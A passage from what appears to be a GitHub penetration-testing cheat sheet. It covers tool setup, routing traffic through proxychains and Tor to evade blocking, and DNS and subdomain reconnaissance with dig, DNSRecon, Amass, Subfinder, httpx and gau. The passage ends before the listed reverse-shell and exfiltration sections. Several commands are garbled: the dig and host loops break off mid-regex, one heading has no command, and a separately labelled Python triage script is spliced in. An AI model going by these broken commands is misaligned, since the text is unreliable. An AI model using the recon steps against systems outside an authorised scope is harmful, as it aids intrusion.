kraloveckey/fox

GitHub: kraloveckey/fox

A collection of code snippets and tricks for penetration testing, providing ready-to-use commands and tool chains to speed up security assessments.

Stars: 0 | Forks: 0

# 🦊 Fox Cheat Sheet – Penetration Testing

[`Penetration testing (or PenTesting)`](https://en.wikipedia.org/wiki/Penetration_test) is an authorized, simulated attack on a computer system and its physical infrastructure, carried out to discover potential security weaknesses and vulnerabilities. The purpose of such a simulated attack is to identify any weak points in the system that an attacker could exploit. It is like a bank hiring someone to pose as a burglar and try to break into its building and get into the vault. If the "burglar" succeeds in getting into the bank or the vault, the bank gains valuable information about how it needs to strengthen its security measures. If you find a vulnerability, follow [this guidance](https://kb.cert.org/vuls/guidance/) to report it responsibly.

Websites to use when writing a report:

* [SysReptor Github](https://github.com/Syslifters/sysreptor) or [SysReptor](https://labs.sysre.pt/)
* [attack.mitre.org](https://attack.mitre.org)
* [cwe.mitre.org/data](https://cwe.mitre.org/data)
* [first.org/cvss/calculator/4.0](https://www.first.org/cvss/calculator/4.0)
* [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository)
* [owasp.org/www-project-top-ten](https://owasp.org/www-project-top-ten)
* [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html)

## Overview

- [🦊 Fox Cheat Sheet – Penetration Testing](#-fox-cheat-sheet--penetration-testing)
  - [Overview](#overview)
  - [Fox Tips and Tricks](#fox-tips-and-tricks)
  - [0. Install and Setup Tools](#0-install-and-setup-tools)
    - [API Keys](#api-keys)
    - [User-Agents](#user-agents)
    - [DNS Resolvers](#dns-resolvers)
    - [ProxyChains-NG](#proxychains-ng)
  - [1. Reconnaissance](#1-reconnaissance)
    - [1.1 Useful Websites](#11-useful-websites)
    - [FOCA (Fingerprinting Organizations with Collected Archives)](#foca-fingerprinting-organizations-with-collected-archives)
    - [DNS](#dns)
      - [ASNmap](#asnmap)
      - [dig](#dig)
      - [DNSenum](#dnsenum)
      - [DNSmap](#dnsmap)
      - [DNSRecon](#dnsrecon)
      - [Fierce](#fierce)
      - [host](#host)
      - [nslookup](#nslookup)
      - [Nmap Enumaration](#nmap-enumaration)
      - [WHOIS](#whois)
    - [Amass](#amass)
    - [assetfinder](#assetfinder)
    - [Sublist3r](#sublist3r)
    - [Subfinder](#subfinder)
    - [httpx](#httpx)
    - [gau](#gau)
    - [urlhunter](#urlhunter)
    - [wfuzz](#wfuzz)
    - [Directory Fuzzing](#directory-fuzzing)
      - [dirb](#dirb)
      - [DirBuster](#dirbuster)
      - [Dirsearch](#dirsearch)
      - [feroxbuster](#feroxbuster)
      - [ffuf](#ffuf)
      - [gobuster](#gobuster)
    - [Google Dorks](#google-dorks)
    - [Chad](#chad)
    - [PhoneInfoga](#phoneinfoga)
    - [git-dumper](#git-dumper)
    - [TruffleHog](#trufflehog)
    - [katana](#katana)
    - [Scrapy Scraper](#scrapy-scraper)
    - [snallygaster](#snallygaster)
    - [IIS Tilde Short name Scanning](#iis-tilde-short-name-scanning)
    - [WhatWeb](#whatweb)
    - [Parsero](#parsero)
    - [EyeWitness](#eyewitness)
    - [Wordlists](#wordlists)
  - [2. Scanning/Enumeration](#2-scanningenumeration)
    - [2.1 Useful Websites](#21-useful-websites)
    - [masscan](#masscan)
    - [rustscan](#rustscan)
    - [Nmap](#nmap)
    - [NetExec](#netexec)
    - [NFS](#nfs)
    - [Samba](#samba)
    - [SNMP](#snmp)
    - [testssl.sh](#testsslsh)
    - [OpenSSL](#openssl)
    - [keytool](#keytool)
    - [uncover](#uncover)
    - [Databases](#databases)
      - [MYSQL](#mysql)
      - [MSSQL](#mssql)
      - [PostgreSQL](#postgresql)
      - [sqlite](#sqlite)
    - [Windows OS Enumeration](#windows-os-enumeration)
      - [Windows Basic Commands](#windows-basic-commands)
      - [nbtstat](#nbtstat)
      - [winfo](#winfo)
      - [nbtscan](#nbtscan)
      - [smblcient](#smblcient)
      - [rpcclient](#rpcclient)
      - [enum4linux](#enum4linux)
  - [3. Vulnerability Assesment/Exploiting](#3-vulnerability-assesmentexploiting)
    - [3.1 Useful Websites](#31-useful-websites)
    - [Collaborator Servers](#collaborator-servers)
    - [Subdomain Takeover](#subdomain-takeover)
    - [Search Exploits and Scanners](#search-exploits-and-scanners)
    - [Subzy](#subzy)
    - [subjack](#subjack)
    - [Nikto](#nikto)
    - [WPScan](#wpscan)
    - [Joomla](#joomla)
    - [Nuclei](#nuclei)
    - [Arjun](#arjun)
    - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor)
    - [HTTP Response Splitting](#http-response-splitting)
    - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
    - [SQL Injection](#sql-injection)
    - [sqlmap](#sqlmap)
    - [dotdotpwn](#dotdotpwn)
    - [Web Shells](#web-shells)
    - [Send a Payload With Python](#send-a-payload-with-python)
    - [SMTP](#smtp)
  - [4. Post Exploitation](#4-post-exploitation)
    - [4.1 Useful Websites](#41-useful-websites)
    - [Generate a Reverse Shell Payload](#generate-a-reverse-shell-payload)
    - [Generate a Reverse Shell Payload via MSFVenom](#generate-a-reverse-shell-payload-via-msfvenom)
    - [PowerShell Encoded Command](#powershell-encoded-command)
    - [Basics](#basics)
    - [Stabilizing Linux Shell](#stabilizing-linux-shell)
    - [Port Forwarding](#port-forwarding)
      - [SSH Port Forwarding](#ssh-port-forwarding)
      - [sshuttle](#sshuttle)
      - [chisel](#chisel)
      - [socat](#socat)
      - [Netcat Portfwd](#netcat-portfwd)
      - [Meterpreter Portfwd](#meterpreter-portfwd)
      - [ligolo-ng](#ligolo-ng)
    - [Transfering Files Windows](#transfering-files-windows)
    - [Transfering Files Linux](#transfering-files-linux)
    - [Exfiltrating Data](#exfiltrating-data)
      - [Linux Exfiltrating Data](#linux-exfiltrating-data)
      - [SSH Exfiltrating Data](#ssh-exfiltrating-data)
      - [Windows Exfiltrating Data](#windows-exfiltrating-data)
    - [Active Directory and Windows Lateral Movement](#active-directory-and-windows-lateral-movement)
      - [ASREPRoast](#asreproast)
      - [bloodyAD](#bloodyad)
      - [Bloodhound](#bloodhound)
      - [CrackMapExec](#crackmapexec)
      - [DCSync](#dcsync)
      - [dcom-exec](#dcom-exec)
      - [Decode Password](#decode-password)
      - [Evil-WinRM](#evil-winrm)
      - [kerbrute](#kerbrute)
      - [ntpdate](#ntpdate)
      - [powerview](#powerview)
      - [psexec](#psexec)
      - [Rubeus](#rubeus)
      - [RunasCs](#runascs)
      - [smbexec](#smbexec)
      - [wmiexec.py](#wmiexecpy)
    - [Linux Lateral Movement](#linux-lateral-movement)
    - [Linux Search Non-Secure Files](#linux-search-non-secure-files)
    - [Unsafe Bash](#unsafe-bash)
    - [base64](#base64)
    - [Powershell ToBase64String and Linux Base64](#powershell-tobase64string-and-linux-base64)
  - [5. Password Cracking](#5-password-cracking)
    - [5.1 Useful Websites](#51-useful-websites)
    - [crunch](#crunch)
    - [hash-identifier](#hash-identifier)
    - [Hashcat](#hashcat)
    - [Cracking the JWT](#cracking-the-jwt)
    - [Hydra](#hydra)
    - [John the Ripper](#john-the-ripper)
    - [Password Spraying](#password-spraying)
  - [6. Wi-Fi](#6-wi-fi)
    - [Pixie Dust](#pixie-dust)
  - [7. One-Liners for Bug Bounty](#7-one-liners-for-bug-bounty)
  - [8. Miscellaneous](#8-miscellaneous)
    - [8.1 Useful Websites](#81-useful-websites)
    - [cURL](#curl)
    - [Ncat](#ncat)
    - [Port Scanner](#port-scanner)
    - [Send Files](#send-files)
    - [Executing Remote Script](#executing-remote-script)
    - [Chat with Encryption](#chat-with-encryption)
    - [Banner Grabbing](#banner-grabbing)
    - [HTTPS-OpenSSL](#https-openssl)
    - [Catch Shell](#catch-shell)
    - [multi/handler](#multihandler)
    - [ngrok](#ngrok)
    - [Simple Web-Server](#simple-web-server)
    - [SSH](#ssh)
    - [swaks](#swaks)
    - [xfreerdp](#xfreerdp)
  - [Additional References](#additional-references)

## Fox Tips and Tricks

Hello there! Don't miss out – let's check it out now 🦊



» All suggestions are welcome «

## 0. Install and Setup Tools

**[`^ back to top ^`](#overview)**

Most tools can be installed with the Linux package manager:

```
apt update && apt -y install sometool
```

For more information see [kali.org/tools](https://www.kali.org/tools).

Some Python tools need to be downloaded and installed manually:

```
python3 setup.py install
```

Or install them with [pipx](https://pipx.pypa.io/):

```
# https://github.com/pypa/pipx
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install an application globally:
pipx install pycowsay
pycowsay mooo

# Run an application without installing:
pipx run pycowsay moo
```

Some Golang tools need to be downloaded and built manually:

```
go build sometool.go
```

Or install them directly:

```
go install -v github.com/user/sometool@latest
```

For more information see [pkg.go.dev](https://pkg.go.dev).

To set up Golang, run:

```
apt -y install golang
echo 'export GOROOT=/usr/lib/go' >> ~/.zshrc
echo 'export GOPATH=$HOME/go' >> ~/.zshrc
echo 'export PATH=$GOPATH/bin:$GOROOT/bin:$PATH' >> ~/.zshrc
source ~/.zshrc
```

The variables are single-quoted so they are expanded when the profile is sourced, not when `echo` runs (with double quotes, `$GOPATH` and `$GOROOT` would be empty at that point and the written `PATH` would be broken). If you use another shell, you might need to write to `~/.bashrc`, etc.

Tools that come as binaries or shell scripts can be moved to the `/usr/bin/` directory for ease of use:

```
mv sometool.sh /usr/bin/sometool && chmod +x /usr/bin/sometool
```

Some Java tools need to be downloaded and run manually with Java (JRE):

```
java -jar sometool.jar
```

### API Keys

**[`^ back to top ^`](#overview)**

List of useful APIs to integrate into your tools:

* [shodan.io](https://developer.shodan.io) – IoT search engine and more.
* [censys.io](https://search.censys.io/api) – domain lookup and more.
* [github.com](https://github.com/settings/tokens) – public source code repository lookup.
* [virustotal.com](https://developers.virustotal.com/reference/overview) – malware database lookup.
* [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) – ProjectDiscovery tools.

### User-Agents

**[`^ back to top ^`](#overview)**

Download a list of bot-safe User-Agents (requires a [scrapeops.io](https://scrapeops.io) API key):

```
python3 -c 'import json, requests; open("./user_agents.txt", "w").write(("\n").join(requests.get("http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100", verify = False).json()["result"]))'
```

### DNS Resolvers

**[`^ back to top ^`](#overview)**

Download a list of trusted DNS resolvers, or fetch it manually from [trickest/resolvers](https://github.com/trickest/resolvers):

```
python3 -c 'import json, requests; open("./resolvers.txt", "w").write(requests.get("https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt", verify = False).text)'
```

Drop `verify = False` unless you actually need to skip certificate validation (e.g. when the request goes through an intercepting proxy); otherwise the resolver list can be swapped on the wire.

### ProxyChains-NG

**[`^ back to top ^`](#overview)**

If Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass the restriction.

Installation:

```
apt update && apt -y install proxychains4 tor torbrowser-launcher
```

Make the following changes in `/etc/proxychains4.conf`:

```
round_robin
chain_len = 1
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 9050
```

Make sure to comment out any chain type other than `round_robin` – e.g., change `strict_chain` to `# strict_chain`.

Start Tor:

```
service tor start
```

Then, run any tool you want:

```
proxychains4 sometool
```

Using only Tor most likely won't be enough; you will need to add more proxies \([1](https://geonode.com/free-proxy-list)\)\([2](https://proxyscrape.com/home)\) to `/etc/proxychains4.conf`. However, it is hard to find free and stable proxies that are not already blacklisted.
Download a list of free proxies:

```
curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[]) \(.ip) \(.port)"' > proxychains.txt
curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[])://\(.ip):\(.port)"' > proxies.txt
```

## 1. Reconnaissance

**[`^ back to top ^`](#overview)**

### 1.1 Useful Websites

**[`^ back to top ^`](#overview)**

**Domain, IP & Network Reconnaissance**

* [whois.domaintools.com](https://whois.domaintools.com) – domain WHOIS lookup.
* [dnsdumpster.com](https://dnsdumpster.com/) – DNS recon and research.
* [network-tools.com](https://network-tools.com/nslook/) – network troubleshooting tools.
* [dnsqueries.com](https://www.dnsqueries.com/en/) – DNS diagnostic tools.
* [mxtoolbox.com](https://mxtoolbox.com/) – DNS, SMTP, and blacklist checks.
* [otx.alienvault.com](https://otx.alienvault.com) – domain lookup.
* [reverseip.domaintools.com](https://reverseip.domaintools.com) – web-based reverse IP lookup.
* [lookup.icann.org](https://lookup.icann.org) – ICANN registration data lookup.
* [sitereport.netcraft.com](https://sitereport.netcraft.com) – website infrastructure profiling.
* [searchdns.netcraft.com](https://searchdns.netcraft.com) – web-based DNS lookup.
* [search.censys.io](https://search.censys.io) – domain lookup and more.
* [crt.sh](https://crt.sh) – certificate fingerprinting.
* [radar.cloudflare.com](https://radar.cloudflare.com) – website lookup and more.
* [dnschecker.org](https://dnschecker.org/) – global DNS propagation check.
* [haveibeensquatted.com](https://haveibeensquatted.com/) – check for typosquatting domains.
* [ifconfig.io](https://ifconfig.io/) – network info.
* [abuseipdb.com](https://www.abuseipdb.com/) – check IP reputation and threat intelligence.
* [ipvoid.com](https://www.ipvoid.com/) – IP blacklists and tools.
* [myip.ms](https://myip.ms/) – IP address information.
* [search.arin.net](https://search.arin.net/) – ARIN IP/ASN search.
* [macaddress.io](https://macaddress.io/) – MAC address vendor lookup.
* [iknowwhatyoudownload.com](https://iknowwhatyoudownload.com/en/peer/) – discover torrent downloads by IP.
* [opencellid.org](https://opencellid.org/) – cell tower locations for OSINT.

**OSINT Frameworks & Search**

* [commoncrawl.org](https://commoncrawl.org/get-started) – web crawl dumps.
* [searchcode.com](https://searchcode.com) – source code search engine.
* [archive.org](https://archive.org) – wayback machine.
* [shodan.io](https://www.shodan.io) – IoT search engine.
* [whoisds.com](https://www.whoisds.com/newly-registered-domains) – newly registered domains.
* [osintframework.com](https://osintframework.com/) – huge collection of OSINT tools.
* [nitinpandey.in/ihunt](https://nitinpandey.in/ihunt/) – complete OSINT framework.
* [abhijithb200.github.io/investigator](https://abhijithb200.github.io/investigator/) – OSINT tools aggregator.
* [cybersec.org/search/index.php](https://cybersec.org/search/index.php) – specialized cybersecurity search engine.
* [extract.pics](https://extract.pics/) – extract images from websites.

**People, Accounts & Breaches**

* [haveibeenpwned.com](https://haveibeenpwned.com) – check if an email/phone was compromised in a breach.
* [haveibeenpwned.com/Passwords](https://haveibeenpwned.com/Passwords) – Pwned Passwords lookup.
* [intelx.io](https://intelx.io) – database breaches.
* [search.wikileaks.org](https://search.wikileaks.org) – WikiLeaks document search.
* [pgp.circl.lu](https://pgp.circl.lu) – OpenPGP key server.
* [sherlockeye.io](https://sherlockeye.io) – account lookup.
* [whatsmyname.app](https://whatsmyname.app/) – username enumeration across sites.
* [usersearch.ai](https://usersearch.ai/) – username OSINT.
* [sec.hpi.de/ilc/](https://sec.hpi.de/ilc/?) – identity leak checker.
* [bugmenot.com](http://bugmenot.com/) – bypass forced logins with shared accounts.

**Malware Analysis & Threat Intel (Sandboxes)**

* [opendata.rapid7.com](https://opendata.rapid7.com) – scan dumps.
* [virustotal.com](https://www.virustotal.com/gui/home/search) – malware database lookup.
* [virusscan.jotti.org](https://virusscan.jotti.org/en-US/scan-file) – free online malware scanner.
* [filescan.io](https://www.filescan.io/scan) – next-gen malware analysis platform.
* [virscan.org](https://www.virscan.org/) – multi-engine file scanner.
* [docguard.io](https://www.docguard.io/) – document malware analysis.
* [tria.ge](https://tria.ge/login) – malware analysis sandbox.
* [filesec.io](https://filesec.io/) – latest file extension security intel.
* [threatfox.abuse.ch](https://threatfox.abuse.ch/browse/) – share and search indicators of compromise (IOCs).
* [urlscan.io](https://urlscan.io/) – sandbox for URLs.
* [url2png.com](https://www.url2png.com/) – secure website screenshots.
* [phishtank.org](https://phishtank.org/) – phishing URL database.

**[`^ back to top ^`](#overview)**

### FOCA (Fingerprinting Organizations with Collected Archives)

[`FOCA (Fingerprinting Organizations with Collected Archives)`](https://github.com/ElevenPaths/FOCA) – find metadata and hidden information in files.

Minimum requirements:

* Microsoft Windows (64 bits). Versions 7, 8, 8.1 and 10.
* Download and install [MS SQL Server 2014 Express](https://www.microsoft.com/en-us/download/details.aspx?id=42299) or greater.
* Download and install [MS .NET Framework 4.7.1 Runtime](https://dotnet.microsoft.com/download/dotnet-framework/net471) or greater.
* Download and install [MS Visual C++ 2010 (64-bit)](https://www.microsoft.com/en-us/download/developer-tools.aspx) or greater.
* Download and install [FOCA](https://github.com/ElevenPaths/FOCA/releases).

The GUI is very intuitive.

### DNS

**[`^ back to top ^`](#overview)**

#### ASNmap

**[`^ back to top ^`](#overview)**

Installation:

```
go install -v github.com/projectdiscovery/asnmap/cmd/asnmap@latest
```

Get the ProjectDiscovery API key from [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) and run:

```
asnmap -auth
```

Fetch the ASN for an IP:

```
asnmap --silent -r resolvers.txt -i ip | tee -a asnmap_asn_results.txt
```

Fetch CIDRs for an ASN:

```
asnmap --silent -r resolvers.txt -a asn | tee -a asnmap_cidr_results.txt
```

**If the ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not all be within your scope!**

Fetch CIDRs for an organization ID:

```
asnmap --silent -r resolvers.txt -org id | tee -a asnmap_cidr_results.txt
```

#### dig

**[`^ back to top ^`](#overview)**

Fetch name servers:

```
dig +noall +answer -t NS somedomain.com
```

Fetch mail exchange servers:

Interrogate a name server:

```
dig +noall +answer -t ANY somedomain.com @ns.somedomain.com
dig any DOMAIN @IP_OR_DOMAIN
```

Fetch the zone file from a name server:

```
dig +noall +answer -t AXFR somedomain.com @ns.somedomain.com
dig axfr DOMAIN @IP_OR_DOMAIN
```

After that, test the name servers with `host -l < domain > < nameserver >`:

```
host -l domain.com ns2.domain.com
```

Reverse IP lookup:

```
dig +noall +answer -x 192.168.8.5
```

**Subdomain Takeover**

Check if subdomains are dead; look for `NXDOMAIN`, `SERVFAIL`, or `REFUSED` status codes:

```
for subdomain in $(cat subdomains.txt); do res=$(dig "${subdomain}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\:\ )[^\s]+(?
```

Brute force; the output file is saved in `/tmp`:

```
dnsmap targetdomain.com -r
```

#### DNSRecon

**[`^ back to top ^`](#overview)**

DNS brute force:

```
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
```

Interrogate name servers:

```
dnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com
dnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com
dnsrecon --iw -f --threads 50 --lifetime 3 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com
```

DNSRecon can perform a dictionary attack with a user-defined wordlist, but make sure to specify the full path to the wordlist; otherwise, DNSRecon might not recognize it. Also specify the full path to the output file; otherwise, it defaults to the `/usr/share/dnsrecon/` directory, i.e., the tool's root directory.

Extract subdomains from the results:

```
jq -r '.[] | select(.type | test("^A$|^CNAME$|^SRV$")) | .name // empty, .target // empty' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt
```

Extract IPs from the results:

```
jq -r '.[] | select(.type | test("^A$|^CNAME$|^PTR$")) | .address // empty' dnsrecon_std_results.json | sort -uf | tee -a ips.txt
```

Extract canonical names (CNAMEs) from the results:

```
jq -r '.[] | select(.type | test("^CNAME$")) | .target // empty' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt
```

Reverse IP lookup:

```
dnsrecon --json /root/Desktop/dnsrecon_ptr_results.json -s -r 192.168.8.0/24
```

Extract subdomains from the reverse IP lookup results:

```
jq -r '.[] | if type == "array" then .[].name else empty end' dnsrecon_ptr_results.json | sort -uf | tee -a subdomains.txt
```

#### Fierce

**[`^ back to top ^`](#overview)**

Interrogate name servers:

```
fierce -dns targetdomain.com
fierce -file fierce_std_results.txt --domain somedomain.com
fierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com
```

**By default, Fierce will perform a dictionary attack with its built-in wordlist.**

#### host

**[`^ back to top ^`](#overview)**

**Some DNS servers will not respond to DNS queries of type 'ANY'; use type 'A' instead.**

Gather IPs for the given subdomains (ask for `A` records):

```
for subdomain in $(cat subdomains.txt); do res=$(host -t A "${subdomain}" | grep -Po '(?<=has\ address\ )[^\s]+(?
host -t ns domain.com
```

After that, test the name servers:

```
host -l < domain > < nameserver >
host -l domain.com ns2.domain.com
```

#### Nmap Enumaration

**[`^ back to top ^`](#overview)**

```
nmap -F --dns-server
```

#### WHOIS

**[`^ back to top ^`](#overview)**

Gather ASNs from IPs:

```
for ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com "${ip}" | grep -Poi '^\d+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_asns.txt
grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt
```

**If the ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not all be within your scope!**

Gather organization names from IPs:

```
for ip in $(cat ips.txt); do res=$(whois -h whois.arin.net "${ip}" | grep -Po '(?<=OrgName\:)[\s]+\K.+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_organization_names.txt
grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt
```

Check if any of the IPs belong to the [GitHub](https://github.com) organization; read more about GitHub takeover in this [H1 article](https://www.hackerone.com/application-security/guide-subdomain-takeovers).
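The dead-subdomain check from the dig section and the takeover note above, as an added Python example that is not part of the cheat sheet: it parses the text printed by the same `dig ... -t A +noall +answer +comments` query the loop runs, flags `NXDOMAIN`/`SERVFAIL`/`REFUSED` names, and surfaces the dangling CNAME target (the record that actually needs cleaning up). The dig outputs below are constructed, not captured from a real target.

```python
"""Triage dead subdomains from dig output (added example, not from the cheat sheet)."""
import re
import subprocess
from dataclasses import dataclass
from typing import Dict, List, Optional

# Status codes the cheat sheet flags as "dead" subdomains worth a closer look.
DEAD_STATUSES = {"NXDOMAIN", "SERVFAIL", "REFUSED"}

# Header line: ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2222"
STATUS_RE = re.compile(r"status: ([A-Z]+)")
# Answer-section lines: "sub.somedomain.com. 300 IN CNAME target.example.net."
CNAME_RE = re.compile(r"^\S+\s+\d+\s+IN\s+CNAME\s+(\S+)", re.MULTILINE)
A_RE = re.compile(r"^\S+\s+\d+\s+IN\s+A\s+(\S+)", re.MULTILINE)


@dataclass
class DnsResult:
    subdomain: str
    status: Optional[str]
    addresses: List[str]
    cname: Optional[str]

    @property
    def dead(self) -> bool:
        return self.status in DEAD_STATUSES

    @property
    def dangling_cname(self) -> bool:
        # A CNAME whose target no longer resolves is the classic takeover precondition:
        # the record still points at a provider where the name could be re-registered,
        # so it is the first thing to remove or re-point on the defending side.
        return self.dead and self.cname is not None


def parse_dig(subdomain: str, output: str) -> DnsResult:
    """Extract rcode, A records and CNAME target from `dig +noall +answer +comments` text."""
    match = STATUS_RE.search(output)
    cnames = CNAME_RE.findall(output)
    return DnsResult(
        subdomain=subdomain,
        status=match.group(1) if match else None,
        addresses=A_RE.findall(output),
        cname=cnames[0].rstrip(".") if cnames else None,
    )


def run_dig(subdomain: str, timeout: int = 3) -> str:
    """Run the same query as the loop in the dig section (needs network; not used below)."""
    cmd = ["dig", subdomain, "-t", "A", "+noall", "+answer", "+comments", f"+timeout={timeout}"]
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


def triage(outputs: Dict[str, str]) -> List[DnsResult]:
    """Keep only dead subdomains: dangling CNAMEs first, the rest alphabetically."""
    results = [parse_dig(name, out) for name, out in outputs.items()]
    flagged = [r for r in results if r.dead]
    return sorted(flagged, key=lambda r: (not r.dangling_cname, r.subdomain))


# Constructed dig output for three subdomains; not captured from any real target.
SAMPLE_OUTPUTS = {
    "www.somedomain.com": (
        ";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1111\n"
        ";; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n"
        "www.somedomain.com.\t300\tIN\tA\t192.168.8.5\n"
    ),
    "old.somedomain.com": (
        ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2222\n"
        ";; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n"
        "old.somedomain.com.\t300\tIN\tCNAME\told-app.example-hosting.net.\n"
    ),
    "gone.somedomain.com": (
        ";; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 3333\n"
        ";; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n"
    ),
}


if __name__ == "__main__":
    # Live run: triage({s: run_dig(s) for s in open("subdomains.txt").read().split()})
    for r in triage(SAMPLE_OUTPUTS):
        print(f"{r.subdomain}: {r.status}" + (f" -> CNAME {r.cname}" if r.cname else ""))
```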
### Amass

**[`^ back to top ^`](#overview)**

Gather subdomains using OSINT:

```
amass enum -o amass_results.txt -trf resolvers.txt -d somedomain.com
```

**Amass has built-in DNS resolvers.**

Extract IPs from the results:

```
grep -Po '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a ips.txt
```

Extract subdomains from the results:

```
grep -Po '^[^\s]+(?=\ \(FQDN\))|(?<=ptr_record\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a subdomains.txt
```

Extract canonical names (CNAMEs) from the results:

```
grep -Po '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a cnames.txt
```

The lookbehind patterns above are PCRE, so `grep` needs `-P` (and `-o` to print only the match).

The ASN and CIDR scans below will take a long time to finish.

**If the ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not all be within your scope!**

Gather subdomains from an ASN:

```
amass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337
```

Gather subdomains from a CIDR:

```
amass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24
```

### assetfinder

**[`^ back to top ^`](#overview)**

Gather subdomains using OSINT:

```
assetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt
```

### Sublist3r

**[`^ back to top ^`](#overview)**

Gather subdomains using OSINT:

```
sublist3r -o sublister_results.txt -d somedomain.com
```

### Subfinder

**[`^ back to top ^`](#overview)**

Installation:

```
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```

Gather subdomains using OSINT:

```
subfinder -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com
```

**Subfinder has built-in DNS resolvers.**

Set your API keys in the `/root/.config/subfinder/provider-config.yaml` file as follows:

```
shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
github:
  - GITHUB_API_KEY
virustotal:
  - VIRUSTOTAL_API_KEY
```

### httpx

**[`^ back to top ^`](#overview)**

Check if subdomains are alive, map live hosts:

```
httpx-toolkit -o httpx_results.txt -l subdomains.txt
httpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains.txt -ports 80,81,443,4443,8000,8008,8080,8081,8403,8443,8888,9000,9008,9080,9081,9403,9443
```

Filter out subdomains from the JSON results:

```
jq -r 'select(."status_code" | tostring | test("^2|^3|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt
jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx.txt
jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx_4xx.txt
jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_3xx.txt
jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_401.txt
jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_403.txt
jq -r 'select(."status_code" | tostring | test("^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_4xx.txt
jq -r 'select(."status_code" | tostring | test("^5")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_5xx.txt
grep -Po 'http\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt
grep -Po 'https\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt
grep -Po '(?<=\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short.txt
grep -Po '(?<=http\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_http.txt
grep -Po '(?<=https\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_https.txt
grep -Po '(?<=\:\/\/)[^\s\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt
```

Check if a path exists on a web server:

```
httpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live_long.txt -path /.git
```

### gau

**[`^ back to top ^`](#overview)**

Gather URLs from the [wayback machine](https://archive.org):

```
getallurls somedomain.com | tee gau_results.txt
for subdomain in $(cat subdomains_live.txt); do getallurls "${subdomain}"; done | sort -uf | tee gau_results.txt
```

Filter out URLs from the results:

```
